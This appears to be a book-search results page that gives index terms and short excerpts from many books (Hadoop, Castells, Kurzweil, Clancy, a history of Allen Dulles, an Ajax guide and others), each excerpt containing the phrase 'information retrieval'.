"side hustle", A Declaration of the Independence of Cyberspace, accounting loophole / creative accounting, affirmative action, Airbnb, AltaVista, Amazon Web Services, Apple II, Apple's 1984 Super Bowl advert, autonomous vehicles, back-to-the-land, barriers to entry, Ben Horowitz, Berlin Wall, Bob Noyce, Buckminster Fuller, Burning Man, business climate, Byte Shop, California gold rush, carried interest, clean water, cleantech, cloud computing, cognitive dissonance, commoditize, computer age, continuous integration, cuban missile crisis, Danny Hillis, DARPA: Urban Challenge, deindustrialization, different worldview, don't be evil, Donald Trump, Doomsday Clock, Douglas Engelbart, Dynabook, Edward Snowden, El Camino Real, Elon Musk, en.wikipedia.org, Erik Brynjolfsson, Frank Gehry, George Gilder, gig economy, Googley, Hacker Ethic, high net worth, Hush-A-Phone, immigration reform, income inequality, informal economy, information retrieval, invention of movable type, invisible hand, Isaac Newton, Jeff Bezos, Joan Didion, job automation, job-hopping, John Markoff, Julian Assange, Kitchen Debate, knowledge economy, knowledge worker, Lyft, Marc Andreessen, Mark Zuckerberg, market bubble, mass immigration, means of production, mega-rich, Menlo Park, Mikhail Gorbachev, millennium bug, Mitch Kapor, Mother of all demos, move fast and break things, move fast and break things, mutually assured destruction, new economy, Norbert Wiener, old-boy network, pattern recognition, Paul Graham, Paul Terrell, paypal mafia, Peter Thiel, pets.com, pirate software, popular electronics, pre–internet, Ralph Nader, RAND corporation, Richard Florida, ride hailing / ride sharing, risk tolerance, Robert Metcalfe, Ronald Reagan, Sand Hill Road, Second Machine Age, self-driving car, shareholder value, side project, Silicon Valley, Silicon Valley ideology, Silicon Valley startup, skunkworks, Snapchat, social graph, software is eating the world, speech recognition, Steve Ballmer, Steve Jobs, Steve 
Wozniak, Steven Levy, Stewart Brand, supercomputer in your pocket, technoutopianism, Ted Nelson, the market place, the new new thing, There's no reason for any individual to have a computer in his home - Ken Olsen, Thomas L Friedman, Tim Cook: Apple, transcontinental railway, Uber and Lyft, uber lyft, Unsafe at Any Speed, upwardly mobile, Vannevar Bush, War on Poverty, We wanted flying cars, instead we got 140 characters, Whole Earth Catalog, WikiLeaks, William Shockley: the traitorous eight, Y Combinator, Y2K

In 1968, the dealers put out the job of “automating” their system for bid, and the firm that won was a four-year-old Southern California start-up named Bunker Ramo. The firm had defense industry roots: founded by Martin Marietta president George Bunker and TRW vice president Simon Ramo, the firm was dedicated to what the two founders termed “a national need in the application of electronics to information handling.” An early client was NASA, for which Bunker Ramo built one of the world’s first computerized information retrieval systems, using the networked computer to classify and categorize large data sets a la Vannevar Bush’s memex.16 At first, the system Bunker Ramo designed for the dealers was simply another digital database that put paper stock tables on line. But when the firm added a feature that allowed brokers to buy and sell over the network, AT&T again cried foul. This wasn’t time-sharing anymore, AT&T lawyers argued; it was two-way telecommunication, and Ma Bell would no longer lease Bunker Ramo its lines.17 Just like Thomas Carter, Bunker and Ramo pushed back.


pages: 933 words: 205,691

Hadoop: The Definitive Guide by Tom White

Amazon Web Services, bioinformatics, business intelligence, combinatorial explosion, database schema, Debian, domain-specific language, en.wikipedia.org, fault tolerance, full text search, Grace Hopper, information retrieval, Internet Archive, Kickstarter, linked data, loose coupling, openstreetmap, recommendation engine, RFID, SETI@home, social graph, web application

Here are the contents of MaxTemperatureWithCounters_Temperature.properties:

CounterGroupName=Air Temperature Records
MISSING.name=Missing
MALFORMED.name=Malformed

Hadoop uses the standard Java localization mechanisms to load the correct properties for the locale you are running in, so, for example, you can create a Chinese version of the properties in a file named MaxTemperatureWithCounters_Temperature_zh_CN.properties, and they will be used when running in the zh_CN locale. Refer to the documentation for java.util.PropertyResourceBundle for more information.

Retrieving counters

In addition to being available via the web UI and the command line (using hadoop job -counter), you can retrieve counter values using the Java API. You can do this while the job is running, although it is more usual to get counters at the end of a job run, when they are stable. Example 8-2 shows a program that calculates the proportion of records that have missing temperature fields.
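The locale fallback the excerpt describes can be illustrated with a minimal Python sketch. This is a simplification of Java's ResourceBundle lookup (language and country only; variant suffixes and default-locale fallback are omitted), and the function name candidate_bundles is illustrative, not part of Hadoop or Java:

```python
# Simplified sketch of Java ResourceBundle's bundle-name lookup order
# (assumption: language/country locale only, no variant, no default-locale fallback).
def candidate_bundles(base_name, locale):
    """Return candidate properties-file base names, most specific first."""
    names = [base_name]
    parts = locale.split("_") if locale else []
    for i in range(1, len(parts) + 1):
        # Append progressively more specific names: base_zh, then base_zh_CN.
        names.append(base_name + "_" + "_".join(parts[:i]))
    # Lookup tries the most specific name first, falling back to the base name.
    return list(reversed(names))

print(candidate_bundles("MaxTemperatureWithCounters_Temperature", "zh_CN"))
# → ['MaxTemperatureWithCounters_Temperature_zh_CN',
#    'MaxTemperatureWithCounters_Temperature_zh',
#    'MaxTemperatureWithCounters_Temperature']
```

Each candidate name would then be checked in order on the classpath with a .properties suffix; those details are omitted here.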


pages: 843 words: 223,858

The Rise of the Network Society by Manuel Castells

"Robert Solow", Apple II, Asian financial crisis, barriers to entry, Big bang: deregulation of the City of London, Bob Noyce, borderless world, British Empire, business cycle, capital controls, complexity theory, computer age, computerized trading, creative destruction, Credit Default Swap, declining real wages, deindustrialization, delayed gratification, dematerialisation, deskilling, disintermediation, double helix, Douglas Engelbart, edge city, experimental subject, financial deregulation, financial independence, floating exchange rates, future of work, global village, Gunnar Myrdal, Hacker Ethic, hiring and firing, Howard Rheingold, illegal immigration, income inequality, Induced demand, industrial robot, informal economy, information retrieval, intermodal, invention of the steam engine, invention of the telephone, inventory management, James Watt: steam engine, job automation, job-hopping, John Markoff, knowledge economy, knowledge worker, labor-force participation, laissez-faire capitalism, Leonard Kleinrock, longitudinal study, low skilled workers, manufacturing employment, Marc Andreessen, Marshall McLuhan, means of production, megacity, Menlo Park, moral panic, new economy, New Urbanism, offshore financial centre, oil shock, open economy, packet switching, Pearl River Delta, peer-to-peer, planetary scale, popular capitalism, popular electronics, post-industrial society, postindustrial economy, prediction markets, Productivity paradox, profit maximization, purchasing power parity, RAND corporation, Robert Gordon, Robert Metcalfe, Shoshana Zuboff, Silicon Valley, Silicon Valley startup, social software, South China Sea, South of Market, San Francisco, special economic zone, spinning jenny, statistical model, Steve Jobs, Steve Wozniak, Ted Nelson, the built environment, the medium is the message, the new new thing, The Wealth of Nations by Adam Smith, Thomas Kuhn: the structure of scientific revolutions, total factor productivity, trade 
liberalization, transaction costs, urban renewal, urban sprawl, zero-sum game

From these he accepts only a few dozen each instant, from which to make an image.19 Because of the low definition of TV, McLuhan argued, viewers have to fill in the gaps in the image, thus becoming more emotionally involved in the viewing (what he, paradoxically, characterized as a “cool medium”). Such involvement does not contradict the hypothesis of the least effort because TV appeals to the associative/lyrical mind, not involving the psychological effort of information retrieving and analyzing to which Herbert Simon’s theory refers. This is why Neil Postman, a leading media scholar, considers that television represents an historical rupture with the typographic mind. While print favors systematic exposition, TV is best suited to casual conversation. To make the distinction sharply, in his own words: “Typography has the strongest possible bias towards exposition: a sophisticated ability to think conceptually, deductively and sequentially; a high valuation of reason and order; an abhorrence of contradiction; a large capacity for detachment and objectivity; and a tolerance for delayed response.”20 While for television, “entertainment is the supra-ideology of all discourse on television.


Seeking SRE: Conversations About Running Production Systems at Scale by David N. Blank-Edelman

Affordable Care Act / Obamacare, algorithmic trading, Amazon Web Services, bounce rate, business continuity plan, business process, cloud computing, cognitive bias, cognitive dissonance, commoditize, continuous integration, crowdsourcing, dark matter, database schema, Debian, defense in depth, DevOps, domain-specific language, en.wikipedia.org, fault tolerance, fear of failure, friendly fire, game design, Grace Hopper, information retrieval, Infrastructure as a Service, Internet of things, invisible hand, iterative process, Kubernetes, loose coupling, Lyft, Marc Andreessen, microservices, minimum viable product, MVC pattern, performance metric, platform as a service, pull request, RAND corporation, remote working, Richard Feynman, risk tolerance, Ruby on Rails, search engine result page, self-driving car, sentiment analysis, Silicon Valley, single page application, Snapchat, software as a service, software is eating the world, source of truth, the scientific method, Toyota Production System, web application, WebSocket, zero day

At that point, prerequisites might be as simple as, “The load will be no more than 10 requests per second, and we expect that responses will take no longer than 10 seconds for a single URL request.” Now let’s invite an SRE to the conversation. One of their first questions would be something like, “Who are our customers? And why is getting the response in 10 seconds important for them?” Despite the fact that these questions came primarily from the business perspective, the information questions like these reveal can change the game dramatically. What if this service is for an “information retrieval” development team whose purpose is to address the necessity of content validation on the search engine results page, to make sure that the new index serves only live links? And what if we download a page with a million links on it? Now we can see the conflict between the priorities in the SLA and those of the service’s purposes. The SLA stated that the response time is crucial, but the service is intended to verify data, with accuracy as the most vital aspect of the service for the end user.


Red Rabbit by Tom Clancy, Scott Brick

anti-communist, battle of ideas, diversified portfolio, Ignaz Semmelweis: hand washing, information retrieval, union organizing, urban renewal

"They operate within fairly strict rules, and both sides seem to play by them." And on both sides, killings had to be authorized at a very high level. Not that this would matter all that much to the corpse in question. "Wet" operations interfered with the main mission, which was gathering information. That was something people occasionally forgot, but something that CIA and KGB mainly understood, which was why both agencies had gotten away from it. But when the information retrieved frightened or otherwise upset the politicians who oversaw the intelligence services, then the spook shops were ordered to do things that they usually preferred to avoid—and so, then, they took their action through surrogates and/or mercenaries, mainly… "Arthur, if KGB wants to hurt the Pope, how do you suppose they'd go about it?" "Not one of their own," Moore thought. "Too dangerous. It would be a political catastrophe, like a tornado going right through the Kremlin.


pages: 761 words: 231,902

The Singularity Is Near: When Humans Transcend Biology by Ray Kurzweil

additive manufacturing, AI winter, Alan Turing: On Computable Numbers, with an Application to the Entscheidungsproblem, Albert Einstein, anthropic principle, Any sufficiently advanced technology is indistinguishable from magic, artificial general intelligence, Asilomar, augmented reality, autonomous vehicles, Benoit Mandelbrot, Bill Joy: nanobots, bioinformatics, brain emulation, Brewster Kahle, Brownian motion, business cycle, business intelligence, c2.com, call centre, carbon-based life, cellular automata, Claude Shannon: information theory, complexity theory, conceptual framework, Conway's Game of Life, coronavirus, cosmological constant, cosmological principle, cuban missile crisis, data acquisition, Dava Sobel, David Brooks, Dean Kamen, disintermediation, double helix, Douglas Hofstadter, en.wikipedia.org, epigenetics, factory automation, friendly AI, George Gilder, Gödel, Escher, Bach, informal economy, information retrieval, invention of the telephone, invention of the telescope, invention of writing, iterative process, Jaron Lanier, Jeff Bezos, job automation, job satisfaction, John von Neumann, Kevin Kelly, Law of Accelerating Returns, life extension, lifelogging, linked data, Loebner Prize, Louis Pasteur, mandelbrot fractal, Marshall McLuhan, Mikhail Gorbachev, Mitch Kapor, mouse model, Murray Gell-Mann, mutually assured destruction, natural language processing, Network effects, new economy, Norbert Wiener, oil shale / tar sands, optical character recognition, pattern recognition, phenotype, premature optimization, randomized controlled trial, Ray Kurzweil, remote working, reversible computing, Richard Feynman, Robert Metcalfe, Rodney Brooks, scientific worldview, Search for Extraterrestrial Intelligence, selection bias, semantic web, Silicon Valley, Singularitarianism, speech recognition, statistical model, stem cell, Stephen Hawking, Stewart Brand, strong AI, superintelligent machines, technological singularity, Ted Kaczynski, telepresence, The Coming 
Technological Singularity, Thomas Bayes, transaction costs, Turing machine, Turing test, Vernor Vinge, Y2K, Yogi Berra

John Smith, director of the ABC Institute—you last saw him six months ago at the XYZ conference" or, "That's the Time-Life Building—your meeting is on the tenth floor." We'll have real-time translation of foreign languages, essentially subtitles on the world, and access to many forms of online information integrated into our daily activities. Virtual personalities that overlay the real world will help us with information retrieval and our chores and transactions. These virtual assistants won't always wait for questions and directives but will step forward if they see us struggling to find a piece of information. (As we wonder about "That actress ... who played the princess, or was it the queen ... in that movie with the robot," our virtual assistant may whisper in our ear or display in our visual field of view: "Natalie Portman as Queen Amidala in Star Wars, episodes 1, 2, and 3.")


pages: 496 words: 174,084

Masterminds of Programming: Conversations With the Creators of Major Programming Languages by Federico Biancuzzi, Shane Warden

Benevolent Dictator For Life (BDFL), business intelligence, business process, cellular automata, cloud computing, commoditize, complexity theory, conceptual framework, continuous integration, data acquisition, domain-specific language, Douglas Hofstadter, Fellow of the Royal Society, finite state, Firefox, follow your passion, Frank Gehry, general-purpose programming language, Guido van Rossum, HyperCard, information retrieval, iterative process, John von Neumann, Larry Wall, linear programming, loose coupling, Mars Rover, millennium bug, NP-complete, Paul Graham, performance metric, Perl 6, QWERTY keyboard, RAND corporation, randomized controlled trial, Renaissance Technologies, Ruby on Rails, Sapir-Whorf hypothesis, Silicon Valley, slashdot, software as a service, software patent, sorting algorithm, Steve Jobs, traveling salesman, Turing complete, type inference, Valgrind, Von Neumann architecture, web application

Don: That’s right, and if you misspell something, or don’t remember exactly what the join column is in a table, your query might not work at all in SQL, whereas less deterministic interfaces like Google are much more forgiving on small mistakes like that. You believe in the importance of determinism. When I write a line of code, I need to rely on understanding what it’s going to do. Don: Well, there are applications where determinism is important and applications where it is not. Traditionally there has been a dividing line between what you might call databases and what you might call information retrieval. Certainly both of those are flourishing fields and they have their respective uses. XQuery and XML Will XML affect the way we use search engines in the future? Don: I think it’s possible. Search engines already exploit the kinds of metadata that are included in HTML tags such as hyperlinks. As you know, XML is a more extensible markup language than HTML. As we begin to see more XML-based standards for marking up specialized documents such as medical and business documents, I think that search engines will learn to take advantage of the semantic information in that markup.


pages: 857 words: 232,302

The Evolutionary Void by Peter F. Hamilton

clean water, information retrieval, Kickstarter, megacity, orbital mechanics / astrodynamics, pattern recognition, plutocrats, Plutocrats, trade route, urban sprawl

That kind of knowledge could only help contribute to going postphysical, surely.” “Don’t call me Shirley.” “What?” Gore ran a hand over his forehead. “Yeah. Right. Whatever.” The Delivery Man was mildly puzzled by Gore’s lack of focus. It wasn’t like him at all. “All right. So what I was thinking is that there has to be some kind of web and database in the cities.” “There is. You can’t access it.” “Why not?” “The AIs are sentient. They won’t allow any information retrieval.” “That’s stupid.” “From our point of view, yes, but they’re the same as the borderguards: They maintain the homeworld’s sanctity; the AIs keep the Anomine’s information safe.” “Why?” “Because that’s what the Anomine do; that’s what they are. They’re entitled to protect what they’ve built, same as anyone.” “But we’re not damag—” “I know!” Gore snarled. “I fucking know that, all right.


pages: 1,201 words: 233,519

Coders at Work by Peter Seibel

Ada Lovelace, bioinformatics, cloud computing, Conway's Game of Life, domain-specific language, don't repeat yourself, Donald Knuth, fault tolerance, Fermat's Last Theorem, Firefox, George Gilder, glass ceiling, Guido van Rossum, HyperCard, information retrieval, Larry Wall, loose coupling, Marc Andreessen, Menlo Park, Metcalfe's law, Perl 6, premature optimization, publish or perish, random walk, revision control, Richard Stallman, rolodex, Ruby on Rails, Saturday Night Live, side project, slashdot, speech recognition, the scientific method, Therac-25, Turing complete, Turing machine, Turing test, type inference, Valgrind, web application

If I was going to draw lessons from it—well again, I'm kind of an elitist: I would say that the people who should be programming are the people who feel comfortable in the world of symbols. If you don't feel really pretty comfortable swimming around in that world, maybe programming isn't what you should be doing. Seibel: Did you have any important mentors? Deutsch: There were two people. One of them is someone who's no longer around; his name was Calvin Mooers. He was an early pioneer in information systems. I believe he is credited with actually coining the term information retrieval. His background was originally in library science. I met him when I was, I think, high-school or college age. He had started to design a programming language that he thought would be usable directly by just people. But he didn't know anything about programming languages. And at that point, I did because I had built this Lisp system and I'd studied some other programming languages. So we got together and the language that he eventually wound up making was one that I think it's fair to say he and I kind of codesigned.


pages: 903 words: 235,753

The Stack: On Software and Sovereignty by Benjamin H. Bratton

1960s counterculture, 3D printing, 4chan, Ada Lovelace, additive manufacturing, airport security, Alan Turing: On Computable Numbers, with an Application to the Entscheidungsproblem, algorithmic trading, Amazon Mechanical Turk, Amazon Web Services, augmented reality, autonomous vehicles, basic income, Benevolent Dictator For Life (BDFL), Berlin Wall, bioinformatics, bitcoin, blockchain, Buckminster Fuller, Burning Man, call centre, carbon footprint, carbon-based life, Cass Sunstein, Celebration, Florida, charter city, clean water, cloud computing, connected car, corporate governance, crowdsourcing, cryptocurrency, dark matter, David Graeber, deglobalization, dematerialisation, disintermediation, distributed generation, don't be evil, Douglas Engelbart, Edward Snowden, Elon Musk, en.wikipedia.org, Eratosthenes, Ethereum, ethereum blockchain, facts on the ground, Flash crash, Frank Gehry, Frederick Winslow Taylor, future of work, Georg Cantor, gig economy, global supply chain, Google Earth, Google Glasses, Guggenheim Bilbao, High speed trading, Hyperloop, illegal immigration, industrial robot, information retrieval, Intergovernmental Panel on Climate Change (IPCC), intermodal, Internet of things, invisible hand, Jacob Appelbaum, Jaron Lanier, Joan Didion, John Markoff, Joi Ito, Jony Ive, Julian Assange, Khan Academy, liberal capitalism, lifelogging, linked data, Mark Zuckerberg, market fundamentalism, Marshall McLuhan, Masdar, McMansion, means of production, megacity, megastructure, Menlo Park, Minecraft, MITM: man-in-the-middle, Monroe Doctrine, Network effects, new economy, offshore financial centre, oil shale / tar sands, packet switching, PageRank, pattern recognition, peak oil, peer-to-peer, performance metric, personalized medicine, Peter Eisenman, Peter Thiel, phenotype, Philip Mirowski, Pierre-Simon Laplace, place-making, planetary scale, RAND corporation, recommendation engine, reserve currency, RFID, Robert Bork, Sand Hill Road, 
self-driving car, semantic web, sharing economy, Silicon Valley, Silicon Valley ideology, Slavoj Žižek, smart cities, smart grid, smart meter, social graph, software studies, South China Sea, sovereign wealth fund, special economic zone, spectrum auction, Startup school, statistical arbitrage, Steve Jobs, Steven Levy, Stewart Brand, Stuxnet, Superbowl ad, supply-chain management, supply-chain management software, TaskRabbit, the built environment, The Chicago School, the scientific method, Torches of Freedom, transaction costs, Turing complete, Turing machine, Turing test, undersea cable, universal basic income, urban planning, Vernor Vinge, Washington Consensus, web application, Westphalian system, WikiLeaks, working poor, Y Combinator

., telcos, states, standards bodies, hardware original equipment manufacturers, and cloud software platforms) all play different roles and control hardware and software applications in different ways and toward different ends. Internet backbone is generally provided and shared by tier 1 bandwidth providers (such as telcos), but one key trend is for very large platforms, such as Google, to bypass other actors and architect complete end-to-end networks, from browser, to fiber, to data center, such that information retrieval, composition, and analysis are consolidated and optimized on private loops. Consider that if Google's own networks, both internal and external, were compared to others, they would represent one of the largest Internet service providers in the world, and by the time this sentence is published, they may very well be the largest. Google indexes the public Internet and mirrors as much of it as possible on its own servers so that it can serve search results and popular pages quickly to Users, regardless of where the original page may originally be coded, sourced, and hosted.


pages: 891 words: 253,901

The Devil's Chessboard: Allen Dulles, the CIA, and the Rise of America's Secret Government by David Talbot

Albert Einstein, anti-communist, Berlin Wall, Bretton Woods, British Empire, Charles Lindbergh, colonial rule, cuban missile crisis, drone strike, information retrieval, Internet Archive, land reform, means of production, Naomi Klein, Norman Mailer, operation paperclip, Ralph Waldo Emerson, RAND corporation

Olson helped oversee the Special Operations Division at Camp Detrick in Maryland, the biological weapons laboratory jointly operated by the U.S. Army and the CIA. The top secret work conducted by the SO Division included research on LSD-induced mind control, assassination toxins, and biological warfare agents like those allegedly being used in Korea. Olson’s division also was involved in research that was euphemistically labeled “information retrieval”—extreme methods of extracting intelligence from uncooperative captives. For the past two years, Olson had been traveling to secret centers in Europe where Soviet prisoners and other human guinea pigs were subjected to these experimental interrogation methods. Dulles began spearheading this CIA research even before he became director of the agency, under a secret program that preceded MKULTRA code-named Operation Artichoke, after the spymaster’s favorite vegetable.


pages: 982 words: 221,145

Ajax: The Definitive Guide by Anthony T. Holdener

AltaVista, Amazon Web Services, business process, centre right, create, read, update, delete, database schema, David Heinemeier Hansson, en.wikipedia.org, Firefox, full text search, game design, general-purpose programming language, Guido van Rossum, information retrieval, loose coupling, MVC pattern, Necker cube, p-value, Ruby on Rails, slashdot, sorting algorithm, web application

Is the site’s focus the white background that constitutes the entire page except for the navigation bar? You know nothing about this site until you dig further by following the links on the page. The point of a business site’s main page is to grab your attention with a central focus: We do web design. Our specialty is architectural engineering. We sell fluffy animals. Regardless of the focus, it should be readily apparent. * Chris Roast, “Designing for Delay in Interactive Information Retrieval,” Interacting with Computers 10 (1998): 87–104. “Need for Speed I,” Zona Research, Zona Market Bulletin (1999). “Need